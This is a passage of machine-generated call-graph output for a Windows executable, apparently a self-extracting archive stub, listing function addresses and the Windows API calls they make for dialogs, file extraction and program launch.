24212->24178 24213->24210 24216 a4ec50 24215->24216 24217 a3a1ed DeleteFileW 24216->24217 24218 a3a200 24217->24218 24219 a3977f 24217->24219 24220 a3bb03 GetCurrentDirectoryW 24218->24220 24219->24178 24221 a3a214 24220->24221 24221->24219 24222 a3a218 DeleteFileW 24221->24222 24222->24219 24223->24212 24224->24183 24227 a4eb3d ___std_exception_copy 24225->24227 24226 a490d6 24226->23753 24227->24226 24230 a4eb59 24227->24230 24234 a57a5e 7 API calls 2 library calls 24227->24234 24229 a4f5c9 24236 a5238d RaiseException 24229->24236 24230->24229 24235 a5238d RaiseException 24230->24235 24233 a4f5e6 24234->24227 24235->24229 24236->24233 24238 a57ce1 _unexpected 24237->24238 24239 a57ce8 24238->24239 24240 a57cfa 24238->24240 24273 a57e2f GetModuleHandleW 24239->24273 24261 a5ac31 EnterCriticalSection 24240->24261 24243 a57ced 24243->24240 24274 a57e73 GetModuleHandleExW 24243->24274 24246 a57d76 24251 a57d8e 24246->24251 24255 a58a91 _abort 5 API calls 24246->24255 24249 a57dbc 24265 a57dee 24249->24265 24250 a57de8 24283 a62390 5 API calls CatchGuardHandler 24250->24283 24256 a58a91 _abort 5 API calls 24251->24256 24255->24251 24259 a57d9f 24256->24259 24257 a57d01 24257->24246 24257->24259 24282 a587e0 20 API calls _abort 24257->24282 24262 a57ddf 24259->24262 24261->24257 24284 a5ac81 LeaveCriticalSection 24262->24284 24264 a57db8 24264->24249 24264->24250 24285 a5b076 24265->24285 24268 a57e1c 24271 a57e73 _abort 8 API calls 24268->24271 24269 a57dfc GetPEB 24269->24268 24270 a57e0c GetCurrentProcess TerminateProcess 24269->24270 24270->24268 24272 a57e24 ExitProcess 24271->24272 24273->24243 24275 a57ec0 24274->24275 24276 a57e9d GetProcAddress 24274->24276 24278 a57ec6 FreeLibrary 24275->24278 24279 a57ecf 24275->24279 24277 a57eb2 24276->24277 24277->24275 24278->24279 24280 a4fbbc CatchGuardHandler 5 API calls 24279->24280 24281 a57cf9 24280->24281 24281->24240 24282->24246 24284->24264 24286 a5b091 24285->24286 24287 a5b09b 24285->24287 24289 a4fbbc CatchGuardHandler 5 API calls 24286->24289 24288 a5ac98 __dosmaperr 5 API calls 24287->24288 24288->24286 24290 a57df8 24289->24290 24290->24268 24290->24269 25426 a41bbd GetCPInfo IsDBCSLeadByte 25408 a4c793 102 API calls 4 library calls 25386 a49580 6 API calls 25387 a4b18d 78 API calls 25353 a4c793 97 API calls 4 library calls 25355 a5b49d 6 API calls CatchGuardHandler 24308 a313e1 84 API calls 2 library calls 24309 a4eae7 24310 a4eaf1 24309->24310 24311 a4e85d ___delayLoadHelper2@8 14 API calls 24310->24311 24312 a4eafe 24311->24312 25356 a4f4e7 29 API calls _abort 24313 a4b7e0 24314 a4b7ea __EH_prolog 24313->24314 24481 a31316 24314->24481 24317 a4bf0f 24546 a4d69e 24317->24546 24318 a4b82a 24320 a4b838 24318->24320 24321 a4b89b 24318->24321 24393 a4b841 24318->24393 24324 a4b83c 24320->24324 24325 a4b878 24320->24325 24323 a4b92e GetDlgItemTextW 24321->24323 24328 a4b8b1 24321->24328 24323->24325 24331 a4b96b 24323->24331 24335 a3e617 53 API calls 24324->24335 24324->24393 24332 a4b95f KiUserCallbackDispatcher 24325->24332 24325->24393 24326 a4bf38 24329 a4bf41 SendDlgItemMessageW 24326->24329 24330 a4bf52 GetDlgItem SendMessageW 24326->24330 24327 a4bf2a SendMessageW 24327->24326 24334 a3e617 53 API calls 24328->24334 24329->24330 24564 a4a64d GetCurrentDirectoryW 24330->24564 24333 a4b980 GetDlgItem 24331->24333 24479 a4b974 24331->24479 24332->24393 24337 a4b994 SendMessageW SendMessageW 24333->24337 24338 a4b9b7 SetFocus 24333->24338 24339 a4b8ce SetDlgItemTextW 24334->24339 24340 a4b85b 24335->24340 24337->24338 24342 a4b9c7 24338->24342 24358 a4b9e0 24338->24358 24343 a4b8d9 24339->24343 24586 a3124f SHGetMalloc 24340->24586 24341 a4bf82 GetDlgItem 24345 a4bfa5 SetWindowTextW 24341->24345 24346 a4bf9f 24341->24346 24348 a3e617 53 API calls 24342->24348 24351 a4b8e6 GetMessageW 24343->24351 24343->24393 24565 a4abab GetClassNameW 24345->24565 24346->24345 24352 a4b9d1 24348->24352 24349 a4be55 24353 a3e617 53 API calls 24349->24353 24356 a4b8fd IsDialogMessageW 24351->24356 24351->24393 24587 a4d4d4 24352->24587 24354 a4be65 SetDlgItemTextW 24353->24354 24360 a4be79 24354->24360 24356->24343 24362 a4b90c TranslateMessage DispatchMessageW 24356->24362 24363 a3e617 53 API calls 24358->24363 24359 a4c1fc SetDlgItemTextW 24359->24393 24365 a3e617 53 API calls 24360->24365 24362->24343 24364 a4ba17 24363->24364 24367 a34092 _swprintf 51 API calls 24364->24367 24401 a4be9c _wcslen 24365->24401 24366 a4bff0 24370 a4c020 24366->24370 24373 a3e617 53 API calls 24366->24373 24372 a4ba29 24367->24372 24368 a4c73f 97 API calls 24368->24366 24369 a4b9d9 24491 a3a0b1 24369->24491 24375 a4c73f 97 API calls 24370->24375 24424 a4c0d8 24370->24424 24376 a4d4d4 16 API calls 24372->24376 24378 a4c003 SetDlgItemTextW 24373->24378 24381 a4c03b 24375->24381 24376->24369 24377 a4c18b 24382 a4c194 EnableWindow 24377->24382 24383 a4c19d 24377->24383 24385 a3e617 53 API calls 24378->24385 24379 a4ba68 GetLastError 24380 a4ba73 24379->24380 24497 a4ac04 SetCurrentDirectoryW 24380->24497 24394 a4c04d 24381->24394 24421 a4c072 24381->24421 24382->24383 24389 a4c1ba 24383->24389 24605 a312d3 GetDlgItem EnableWindow 24383->24605 24384 a4beed 24388 a3e617 53 API calls 24384->24388 24390 a4c017 SetDlgItemTextW 24385->24390 24387 a4ba87 24391 a4ba90 GetLastError 24387->24391 24392 a4ba9e 24387->24392 24388->24393 24397 a4c1e1 24389->24397 24406 a4c1d9 SendMessageW 24389->24406 24390->24370 24391->24392 24403 a4bb20 24392->24403 24407 a4baae GetTickCount 24392->24407 24454 a4bb11 24392->24454 24603 a49ed5 32 API calls 24394->24603 24395 a4c0cb 24398 a4c73f 97 API calls 24395->24398 24397->24393 24408 a3e617 53 API calls 24397->24408 24398->24424 24400 a4c1b0 24606 a312d3 GetDlgItem EnableWindow 24400->24606 24401->24384 24409 a3e617 53 API calls 24401->24409 24402 a4bd56 24506 a312f1 GetDlgItem ShowWindow 24402->24506 24410 a4bcfb 24403->24410 24412 a4bcf1 24403->24412 24413 a4bb39 GetModuleFileNameW 24403->24413 24404 a4c066 24404->24421 24406->24397 24415 a34092 _swprintf 51 API calls 24407->24415 24416 a4b862 24408->24416 24417 a4bed0 24409->24417 24420 a3e617 53 API calls 24410->24420 24411 a4c169 24604 a49ed5 32 API calls 24411->24604 24412->24325 24412->24410 24597 a3f28c 82 API calls 24413->24597 24423 a4bac7 24415->24423 24416->24359 24416->24393 24425 a34092 _swprintf 51 API calls 24417->24425 24428 a4bd05 24420->24428 24421->24395 24429 a4c73f 97 API calls 24421->24429 24422 a4bd66 24507 a312f1 GetDlgItem ShowWindow 24422->24507 24498 a3966e 24423->24498 24424->24377 24424->24411 24431 a3e617 53 API calls 24424->24431 24425->24384 24426 a4c188 24426->24377 24427 a4bb5f 24432 a34092 _swprintf 51 API calls 24427->24432 24433 a34092 _swprintf 51 API calls 24428->24433 24434 a4c0a0 24429->24434 24431->24424 24436 a4bb81 CreateFileMappingW 24432->24436 24437 a4bd23 24433->24437 24434->24395 24438 a4c0a9 DialogBoxParamW 24434->24438 24435 a4bd70 24439 a3e617 53 API calls 24435->24439 24441 a4bc60 __InternalCxxFrameHandler 24436->24441 24442 a4bbe3 GetCommandLineW 24436->24442 24450 a3e617 53 API calls 24437->24450 24438->24325 24438->24395 24443 a4bd7a SetDlgItemTextW 24439->24443 24446 a4bc6b ShellExecuteExW 24441->24446 24445 a4bbf4 24442->24445 24508 a312f1 GetDlgItem ShowWindow 24443->24508 24444 a4baed 24448 a4baf4 GetLastError 24444->24448 24452 a4baff 24444->24452 24598 a4b425 SHGetMalloc 24445->24598 24465 a4bc88 24446->24465 24448->24452 24456 a4bd3d 24450->24456 24451 a4bd8c SetDlgItemTextW GetDlgItem 24457 a4bdc1 24451->24457 24458 a4bda9 GetWindowLongW SetWindowLongW 24451->24458 24453 a3959a 80 API calls 24452->24453 24453->24454 24454->24402 24454->24403 24455 a4bc10 24599 a4b425 SHGetMalloc 24455->24599 24509 a4c73f 24457->24509 24458->24457 24461 a4bc1c 24600 a4b425 SHGetMalloc 24461->24600 24464 a4bccb 24464->24412 24470 a4bce1 UnmapViewOfFile CloseHandle 24464->24470 24465->24464 24474 a4bcb7 Sleep 24465->24474 24466 a4c73f 97 API calls 24467 a4bddd 24466->24467 24534 a4da52 24467->24534 24468 a4bc28 24601 a3f3fa 82 API calls 2 library calls 24468->24601 24470->24412 24473 a4bc3f MapViewOfFile 24473->24441 24474->24464 24474->24465 24475 a4c73f 97 API calls 24478 a4be03 24475->24478 24476 a4be2c 24602 a312d3 GetDlgItem EnableWindow 24476->24602 24478->24476 24480 a4c73f 97 API calls 24478->24480 24479->24325 24479->24349 24480->24476 24482 a31378 24481->24482 24483 a3131f 24481->24483 24608 a3e2c1 GetWindowLongW SetWindowLongW 24482->24608 24484 a31385 24483->24484 24607 a3e2e8 62 API calls 2 library calls 24483->24607 24484->24317 24484->24318 24484->24393 24487 a31341 24487->24484 24488 a31354 GetDlgItem 24487->24488 24488->24484 24489 a31364 24488->24489 24489->24484 24490 a3136a SetWindowTextW 24489->24490 24490->24484 24494 a3a0bb 24491->24494 24492 a3a14c 24493 a3a2b2 8 API calls 24492->24493 24495 a3a175 24492->24495 24493->24495 24494->24492 24494->24495 24609 a3a2b2 24494->24609 24495->24379 24495->24380 24497->24387 24499 a39678 24498->24499 24500 a396d5 CreateFileW 24499->24500 24501 a396c9 24499->24501 24500->24501 24502 a3971f 24501->24502 24503 a3bb03 GetCurrentDirectoryW 24501->24503 24502->24444 24504 a39704 24503->24504 24504->24502 24505 a39708 CreateFileW 24504->24505 24505->24502 24506->24422 24507->24435 24508->24451 24510 a4c749 __EH_prolog 24509->24510 24511 a4bdcf 24510->24511 24641 a4b314 24510->24641 24511->24466 24514 a4b314 ExpandEnvironmentStringsW 24521 a4c780 _wcslen _wcsrchr 24514->24521 24515 a4ca67 SetWindowTextW 24515->24521 24520 a4c855 SetFileAttributesW 24522 a4c90f GetFileAttributesW 24520->24522 24523 a4c86f __cftof _wcslen 24520->24523 24521->24511 24521->24514 24521->24515 24521->24520 24527 a4cc31 GetDlgItem SetWindowTextW SendMessageW 24521->24527 24530 a4cc71 SendMessageW 24521->24530 24645 a41fbb CompareStringW 24521->24645 24646 a4a64d GetCurrentDirectoryW 24521->24646 24648 a3a5d1 6 API calls 24521->24648 24649 a3a55a FindClose 24521->24649 24650 a4b48e 76 API calls 2 library calls 24521->24650 24651 a53e3e 24521->24651 24522->24521 24525 a4c921 DeleteFileW 24522->24525 24523->24521 24523->24522 24647 a3b991 51 API calls 2 library calls 24523->24647 24525->24521 24528 a4c932 24525->24528 24527->24521 24529 a34092 _swprintf 51 API calls 24528->24529 24531 a4c952 GetFileAttributesW 24529->24531 24530->24521 24531->24528 24532 a4c967 MoveFileW 24531->24532 24532->24521 24533 a4c97f MoveFileExW 24532->24533 24533->24521 24535 a4da5c __EH_prolog 24534->24535 24666 a40659 24535->24666 24537 a4da8d 24670 a35b3d 24537->24670 24539 a4daab 24674 a37b0d 24539->24674 24543 a4dafe 24690 a37b9e 24543->24690 24545 a4bdee 24545->24475 24547 a4d6a8 24546->24547 24548 a4a5c6 4 API calls 24547->24548 24549 a4d6ad 24548->24549 24550 a4d6b5 GetWindow 24549->24550 24551 a4bf15 24549->24551 24550->24551 24556 a4d6d5 24550->24556 24551->24326 24551->24327 24552 a4d6e2 GetClassNameW 25175 a41fbb CompareStringW 24552->25175 24554 a4d706 GetWindowLongW 24555 a4d76a GetWindow 24554->24555 24557 a4d716 SendMessageW 24554->24557 24555->24551 24555->24556 24556->24551 24556->24552 24556->24554 24556->24555 24557->24555 24558 a4d72c GetObjectW 24557->24558 25176 a4a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24558->25176 24560 a4d743 25177 a4a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24560->25177 25178 a4a80c 8 API calls 24560->25178 24563 a4d754 SendMessageW DeleteObject 24563->24555 24564->24341 24566 a4abf1 24565->24566 24567 a4abcc 24565->24567 24569 a4abf6 SHAutoComplete 24566->24569 24570 a4abff 24566->24570 25179 a41fbb CompareStringW 24567->25179 24569->24570 24573 a4b093 24570->24573 24571 a4abdf 24571->24566 24572 a4abe3 FindWindowExW 24571->24572 24572->24566 24574 a4b09d __EH_prolog 24573->24574 24575 a313dc 84 API calls 24574->24575 24576 a4b0bf 24575->24576 25180 a31fdc 24576->25180 24579 a4b0d9 24581 a31692 86 API calls 24579->24581 24580 a4b0eb 24582 a319af 128 API calls 24580->24582 24583 a4b0e4 24581->24583 24585 a4b10d __InternalCxxFrameHandler ___std_exception_copy 24582->24585 24583->24366 24583->24368 24584 a31692 86 API calls 24584->24583 24585->24584 24586->24416 25188 a4b568 PeekMessageW 24587->25188 24590 a4d536 SendMessageW SendMessageW 24592 a4d591 SendMessageW SendMessageW SendMessageW 24590->24592 24593 a4d572 24590->24593 24591 a4d502 24596 a4d50d ShowWindow SendMessageW SendMessageW 24591->24596 24594 a4d5c4 SendMessageW 24592->24594 24595 a4d5e7 SendMessageW 24592->24595 24593->24592 24594->24595 24595->24369 24596->24590 24597->24427 24598->24455 24599->24461 24600->24468 24601->24473 24602->24479 24603->24404 24604->24426 24605->24400 24606->24389 24607->24487 24608->24484 24610 a3a2bf 24609->24610 24611 a3a2e3 24610->24611 24612 a3a2d6 CreateDirectoryW 24610->24612 24630 a3a231 24611->24630 24612->24611 24614 a3a316 24612->24614 24617 a3a325 24614->24617 24622 a3a4ed 24614->24622 24616 a3a329 GetLastError 24616->24617 24617->24494 24618 a3bb03 GetCurrentDirectoryW 24620 a3a2ff 24618->24620 24620->24616 24621 a3a303 CreateDirectoryW 24620->24621 24621->24614 24621->24616 24623 a4ec50 24622->24623 24624 a3a4fa SetFileAttributesW 24623->24624 24625 a3a510 24624->24625 24626 a3a53d 24624->24626 24627 a3bb03 GetCurrentDirectoryW 24625->24627 24626->24617 24628 a3a524 24627->24628 24628->24626 24629 a3a528 SetFileAttributesW 24628->24629 24629->24626 24633 a3a243 24630->24633 24634 a4ec50 24633->24634 24635 a3a250 GetFileAttributesW 24634->24635 24636 a3a261 24635->24636 24637 a3a23a 24635->24637 24638 a3bb03 GetCurrentDirectoryW 24636->24638 24637->24616 24637->24618 24639 a3a275 24638->24639 24639->24637 24640 a3a279 GetFileAttributesW 24639->24640 24640->24637 24642 a4b31e 24641->24642 24643 a4b40d 24642->24643 24644 a4b3f0 ExpandEnvironmentStringsW 24642->24644 24643->24521 24644->24643 24645->24521 24646->24521 24647->24523 24648->24521 24649->24521 24650->24521 24652 a58e54 24651->24652 24653 a58e61 24652->24653 24654 a58e6c 24652->24654 24655 a58e06 __vsnwprintf_l 21 API calls 24653->24655 24656 a58e74 24654->24656 24662 a58e7d __dosmaperr 24654->24662 24660 a58e69 24655->24660 24657 a58dcc _free 20 API calls 24656->24657 24657->24660 24658 a58ea7 HeapReAlloc 24658->24660 24658->24662 24659 a58e82 24664 a591a8 20 API calls __dosmaperr 24659->24664 24660->24521 24662->24658 24662->24659 24665 a57a5e 7 API calls 2 library calls 24662->24665 24664->24660 24665->24662 24667 a40666 _wcslen 24666->24667 24694 a317e9 24667->24694 24669 a4067e 24669->24537 24671 a40659 _wcslen 24670->24671 24672 a317e9 78 API calls 24671->24672 24673 a4067e 24672->24673 24673->24539 24675 a37b17 __EH_prolog 24674->24675 24711 a3ce40 24675->24711 24677 a37b32 24678 a4eb38 8 API calls 24677->24678 24679 a37b5c 24678->24679 24717 a44a76 24679->24717 24682 a37c7d 24683 a37c87 24682->24683 24685 a37cf1 24683->24685 24746 a3a56d 24683->24746 24687 a37d50 24685->24687 24724 a38284 24685->24724 24686 a37d92 24686->24543 24687->24686 24752 a3138b 74 API calls 24687->24752 24691 a37bac 24690->24691 24693 a37bb3 24690->24693 24692 a42297 86 API calls 24691->24692 24692->24693 24695 a317ff 24694->24695 24705 a3185a __InternalCxxFrameHandler 24694->24705 24696 a31828 24695->24696 24707 a36c36 76 API calls __vswprintf_c_l 24695->24707 24698 a31887 24696->24698 24703 a31847 ___std_exception_copy 24696->24703 24700 a53e3e 22 API calls 24698->24700 24699 a3181e 24708 a36ca7 75 API calls 24699->24708 24702 a3188e 24700->24702 24702->24705 24710 a36ca7 75 API calls 24702->24710 24703->24705 24709 a36ca7 75 API calls 24703->24709 24705->24669 24707->24699 24708->24696 24709->24705 24710->24705 24712 a3ce4a __EH_prolog 24711->24712 24713 a4eb38 8 API calls 24712->24713 24714 a3ce8d 24713->24714 24715 a4eb38 8 API calls 24714->24715 24716 a3ceb1 24715->24716 24716->24677 24718 a44a80 __EH_prolog 24717->24718 24719 a4eb38 8 API calls 24718->24719 24721 a44a9c 24719->24721 24720 a37b8b 24720->24682 24721->24720 24723 a40e46 80 API calls 24721->24723 24723->24720 24725 a3828e __EH_prolog 24724->24725 24753 a313dc 24725->24753 24727 a382aa 24728 a382bb 24727->24728 24896 a39f42 24727->24896 24731 a382f2 24728->24731 24761 a31a04 24728->24761 24892 a31692 24731->24892 24734 a38389 24780 a38430 24734->24780 24737 a383e8 24788 a31f6d 24737->24788 24741 a382ee 24741->24731 24741->24734 24743 a3a56d 7 API calls 24741->24743 24900 a3c0c5 CompareStringW _wcslen 24741->24900 24742 a383f3 24742->24731 24792 a33b2d 24742->24792 24804 a3848e 24742->24804 24743->24741 24747 a3a582 24746->24747 24751 a3a5b0 24747->24751 25164 a3a69b 24747->25164 24749 a3a592 24750 a3a597 FindClose 24749->24750 24749->24751 24750->24751 24751->24683 24752->24686 24754 a313e1 __EH_prolog 24753->24754 24755 a3ce40 8 API calls 24754->24755 24756 a31419 24755->24756 24757 a4eb38 8 API calls 24756->24757 24759 a31474 __cftof 24756->24759 24758 a31461 24757->24758 24758->24759 24901 a3b505 24758->24901 24759->24727 24762 a31a0e __EH_prolog 24761->24762 24774 a31a61 24762->24774 24777 a31b9b 24762->24777 24917 a313ba 24762->24917 24764 a31bc7 24920 a3138b 74 API calls 24764->24920 24767 a33b2d 101 API calls 24771 a31c12 24767->24771 24768 a31bd4 24768->24767 24768->24777 24769 a31c5a 24773 a31c8d 24769->24773 24769->24777 24921 a3138b 74 API calls 24769->24921 24771->24769 24772 a33b2d 101 API calls 24771->24772 24772->24771 24773->24777 24778 a39e80 79 API calls 24773->24778 24774->24764 24774->24768 24774->24777 24775 a33b2d 101 API calls 24776 a31cde 24775->24776 24776->24775 24776->24777 24777->24741 24778->24776 24779 a39e80 79 API calls 24779->24774 24939 a3cf3d 24780->24939 24782 a38440 24943 a413d2 GetSystemTime SystemTimeToFileTime 24782->24943 24784 a383a3 24784->24737 24785 a41b66 24784->24785 24948 a4de6b 24785->24948 24789 a31f72 __EH_prolog 24788->24789 24791 a31fa6 24789->24791 24956 a319af 24789->24956 24791->24742 24793 a33b39 24792->24793 24794 a33b3d 24792->24794 24793->24742 24803 a39e80 79 API calls 24794->24803 24795 a33b4f 24796 a33b6a 24795->24796 24797 a33b78 24795->24797 24798 a33baa 24796->24798 25086 a332f7 89 API calls 2 library calls 24796->25086 25087 a3286b 101 API calls 3 library calls 24797->25087 24798->24742 24801 a33b76 24801->24798 25088 a320d7 74 API calls 24801->25088 24803->24795 24805 a38498 __EH_prolog 24804->24805 24808 a384d5 24805->24808 24819 a38513 24805->24819 25113 a48c8d 103 API calls 24805->25113 24807 a384f5 24809 a384fa 24807->24809 24810 a3851c 24807->24810 24808->24807 24813 a3857a 24808->24813 24808->24819 24809->24819 25114 a37a0d 152 API calls 24809->25114 24810->24819 25115 a48c8d 103 API calls 24810->25115 24813->24819 25089 a35d1a 24813->25089 24815 a38605 24815->24819 25095 a38167 24815->25095 24818 a38797 24820 a3a56d 7 API calls 24818->24820 24821 a38802 24818->24821 24819->24742 24820->24821 25101 a37c0d 24821->25101 24823 a3d051 82 API calls 24829 a3885d 24823->24829 24824 a38a5f 24830 a38ab6 24824->24830 24843 a38a6a 24824->24843 24825 a38992 24825->24824 24832 a389e1 24825->24832 24826 a3898b 25118 a32021 74 API calls 24826->25118 24829->24819 24829->24823 24829->24825 24829->24826 25116 a38117 84 API calls 24829->25116 25117 a32021 74 API calls 24829->25117 24836 a38a4c 24830->24836 25121 a37fc0 97 API calls 24830->25121 24831 a38ab4 24837 a3959a 80 API calls 24831->24837 24834 a38b14 24832->24834 24832->24836 24838 a3a231 3 API calls 24832->24838 24833 a39105 24835 a3959a 80 API calls 24833->24835 24834->24833 24852 a38b82 24834->24852 25122 a398bc 24834->25122 24835->24819 24836->24831 24836->24834 24837->24819 24840 a38a19 24838->24840 24840->24836 25119 a392a3 97 API calls 24840->25119 24841 a3ab1a 8 API calls 24844 a38bd1 24841->24844 24843->24831 25120 a37db2 101 API calls 24843->25120 24847 a3ab1a 8 API calls 24844->24847 24864 a38be7 24847->24864 24850 a38b70 25126 a36e98 77 API calls 24850->25126 24852->24841 24853 a38cbc 24854 a38e40 24853->24854 24855 a38d18 24853->24855 24857 a38e52 24854->24857 24858 a38e66 24854->24858 24878 a38d49 24854->24878 24856 a38d8a 24855->24856 24859 a38d28 24855->24859 24866 a38167 19 API calls 24856->24866 24860 a39215 123 API calls 24857->24860 24861 a43377 75 API calls 24858->24861 24862 a38d6e 24859->24862 24870 a38d37 24859->24870 24860->24878 24863 a38e7f 24861->24863 24862->24878 25129 a377b8 111 API calls 24862->25129 25132 a43020 123 API calls 24863->25132 24864->24853 24865 a38c93 24864->24865 24873 a3981a 79 API calls 24864->24873 24865->24853 25127 a39a3c 82 API calls 24865->25127 24871 a38dbd 24866->24871 25128 a32021 74 API calls 24870->25128 24874 a38de6 24871->24874 24875 a38df5 24871->24875 24871->24878 24873->24865 25130 a37542 85 API calls 24874->25130 25131 a39155 93 API calls __EH_prolog 24875->25131 24881 a38f85 24878->24881 25133 a32021 74 API calls 24878->25133 24880 a39090 24880->24833 24883 a3a4ed 3 API calls 24880->24883 24881->24833 24881->24880 24882 a3903e 24881->24882 25107 a39f09 SetEndOfFile 24881->25107 25108 a39da2 24882->25108 24884 a390eb 24883->24884 24884->24833 25134 a32021 74 API calls 24884->25134 24887 a39085 24888 a39620 77 API calls 24887->24888 24888->24880 24890 a390fb 25135 a36dcb 76 API calls 24890->25135 24893 a316a4 24892->24893 25151 a3cee1 24893->25151 24897 a39f59 24896->24897 24898 a39f63 24897->24898 25163 a36d0c 78 API calls 24897->25163 24898->24728 24900->24741 24902 a3b50f __EH_prolog 24901->24902 24907 a3f1d0 82 API calls 24902->24907 24904 a3b521 24908 a3b61e 24904->24908 24907->24904 24909 a3b630 __cftof 24908->24909 24912 a410dc 24909->24912 24915 a4109e GetCurrentProcess GetProcessAffinityMask 24912->24915 24916 a3b597 24915->24916 24916->24759 24922 a31732 24917->24922 24919 a313d6 24919->24779 24920->24777 24921->24773 24923 a317a0 __InternalCxxFrameHandler 24922->24923 24924 a31748 24922->24924 24923->24919 24925 a31771 24924->24925 24935 a36c36 76 API calls __vswprintf_c_l 24924->24935 24927 a317c7 24925->24927 24932 a3178d ___std_exception_copy 24925->24932 24929 a53e3e 22 API calls 24927->24929 24928 a31767 24936 a36ca7 75 API calls 24928->24936 24931 a317ce 24929->24931 24931->24923 24938 a36ca7 75 API calls 24931->24938 24932->24923 24937 a36ca7 75 API calls 24932->24937 24935->24928 24936->24925 24937->24923 24938->24923 24940 a3cf4d 24939->24940 24942 a3cf54 24939->24942 24944 a3981a 24940->24944 24942->24782 24943->24784 24945 a39833 24944->24945 24947 a39e80 79 API calls 24945->24947 24946 a39865 24946->24942 24947->24946 24949 a4de78 24948->24949 24950 a3e617 53 API calls 24949->24950 24951 a4de9b 24950->24951 24952 a34092 _swprintf 51 API calls 24951->24952 24953 a4dead 24952->24953 24954 a4d4d4 16 API calls 24953->24954 24955 a41b7c 24954->24955 24955->24737 24957 a319bf 24956->24957 24959 a319bb 24956->24959 24960 a318f6 24957->24960 24959->24791 24961 a31908 24960->24961 24962 a31945 24960->24962 24963 a33b2d 101 API calls 24961->24963 24968 a33fa3 24962->24968 24966 a31928 24963->24966 24966->24959 24971 a33fac 24968->24971 24969 a33b2d 101 API calls 24969->24971 24971->24969 24972 a31966 24971->24972 24985 a40e08 24971->24985 24972->24966 24973 a31e50 24972->24973 24974 a31e5a __EH_prolog 24973->24974 24993 a33bba 24974->24993 24976 a31e84 24977 a31732 78 API calls 24976->24977 24980 a31f0b 24976->24980 24978 a31e9b 24977->24978 25021 a318a9 78 API calls 24978->25021 24980->24966 24981 a31eb3 24983 a31ebf _wcslen 24981->24983 25022 a41b84 MultiByteToWideChar 24981->25022 25023 a318a9 78 API calls 24983->25023 24986 a40e0f 24985->24986 24988 a40e2a 24986->24988 24991 a36c31 RaiseException _com_raise_error 24986->24991 24989 a40e3b SetThreadExecutionState 24988->24989 24992 a36c31 RaiseException _com_raise_error 24988->24992 24989->24971 24991->24988 24992->24989 24994 a33bc4 __EH_prolog 24993->24994 24995 a33bf6 24994->24995 24996 a33bda 24994->24996 24998 a33e51 24995->24998 25000 a33c22 24995->25000 25049 a3138b 74 API calls 24996->25049 25066 a3138b 74 API calls 24998->25066 25013 a33be5 25000->25013 25024 a43377 25000->25024 25002 a33ca3 25003 a33d2e 25002->25003 25020 a33c9a 25002->25020 25052 a3d051 25002->25052 25034 a3ab1a 25003->25034 25004 a33c9f 25004->25002 25051 a320bd 78 API calls 25004->25051 25006 a33c71 25006->25002 25006->25004 25007 a33c8f 25006->25007 25050 a3138b 74 API calls 25007->25050 25011 a33d41 25014 a33dd7 25011->25014 25015 a33dc7 25011->25015 25013->24976 25058 a43020 123 API calls 25014->25058 25038 a39215 25015->25038 25018 a33dd5 25018->25020 25059 a32021 74 API calls 25018->25059 25060 a42297 25020->25060 25021->24981 25022->24983 25023->24980 25025 a4338c 25024->25025 25026 a43396 ___std_exception_copy 25024->25026 25067 a36ca7 75 API calls 25025->25067 25028 a4341c 25026->25028 25029 a434c6 25026->25029 25033 a43440 __cftof 25026->25033 25068 a432aa 75 API calls 3 library calls 25028->25068 25069 a5238d RaiseException 25029->25069 25032 a434f2 25033->25006 25035 a3ab28 25034->25035 25037 a3ab32 25034->25037 25036 a4eb38 8 API calls 25035->25036 25036->25037 25037->25011 25039 a3921f __EH_prolog 25038->25039 25070 a37c64 25039->25070 25042 a313ba 78 API calls 25043 a39231 25042->25043 25073 a3d114 25043->25073 25046 a3d114 118 API calls 25047 a39243 25046->25047 25047->25046 25048 a3928a 25047->25048 25082 a3d300 97 API calls __InternalCxxFrameHandler 25047->25082 25048->25018 25049->25013 25050->25020 25051->25002 25053 a3d072 25052->25053 25054 a3d084 25052->25054 25083 a3603a 82 API calls 25053->25083 25084 a3603a 82 API calls 25054->25084 25057 a3d07c 25057->25003 25058->25018 25059->25020 25062 a422a1 25060->25062 25061 a422ba 25085 a40eed 86 API calls 25061->25085 25062->25061 25065 a422ce 25062->25065 25064 a422c1 25064->25065 25066->25013 25067->25026 25068->25033 25069->25032 25071 a3b146 GetVersionExW 25070->25071 25072 a37c69 25071->25072 25072->25042 25079 a3d12a __InternalCxxFrameHandler 25073->25079 25074 a3d29a 25075 a3d0cb 6 API calls 25074->25075 25076 a3d2ce 25074->25076 25075->25076 25077 a40e08 SetThreadExecutionState RaiseException 25076->25077 25080 a3d291 25077->25080 25078 a48c8d 103 API calls 25078->25079 25079->25074 25079->25078 25079->25080 25081 a3ac05 91 API calls 25079->25081 25080->25047 25081->25079 25082->25047 25083->25057 25084->25057 25085->25064 25086->24801 25087->24801 25088->24798 25090 a35d2a 25089->25090 25136 a35c4b 25090->25136 25093 a35d5d 25094 a35d95 25093->25094 25141 a3b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25093->25141 25094->24815 25096 a38186 25095->25096 25097 a38232 25096->25097 25148 a3be5e 19 API calls __InternalCxxFrameHandler 25096->25148 25147 a41fac CharUpperW 25097->25147 25100 a3823b 25100->24818 25102 a37c22 25101->25102 25103 a37c5a 25102->25103 25149 a36e7a 74 API calls 25102->25149 25103->24829 25105 a37c52 25150 a3138b 74 API calls 25105->25150 25107->24882 25109 a39db3 25108->25109 25111 a39dc2 25108->25111 25110 a39db9 FlushFileBuffers 25109->25110 25109->25111 25110->25111 25112 a39e3f SetFileTime 25111->25112 25112->24887 25113->24808 25114->24819 25115->24819 25116->24829 25117->24829 25118->24825 25119->24836 25120->24831 25121->24836 25123 a38b5a 25122->25123 25124 a398c5 GetFileType 25122->25124 25123->24852 25125 a32021 74 API calls 25123->25125 25124->25123 25125->24850 25126->24852 25127->24853 25128->24878 25129->24878 25130->24878 25131->24878 25132->24878 25133->24881 25134->24890 25135->24833 25142 a35b48 25136->25142 25138 a35c6c 25138->25093 25140 a35b48 2 API calls 25140->25138 25141->25093 25143 a35b52 25142->25143 25145 a35c3a 25143->25145 25146 a3b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25143->25146 25145->25138 25145->25140 25146->25143 25147->25100 25148->25097 25149->25105 25150->25103 25152 a3cef2 25151->25152 25157 a3a99e 25152->25157 25154 a3cf24 25155 a3a99e 86 API calls 25154->25155 25156 a3cf2f 25155->25156 25158 a3a9c1 25157->25158 25161 a3a9d5 25157->25161 25162 a40eed 86 API calls 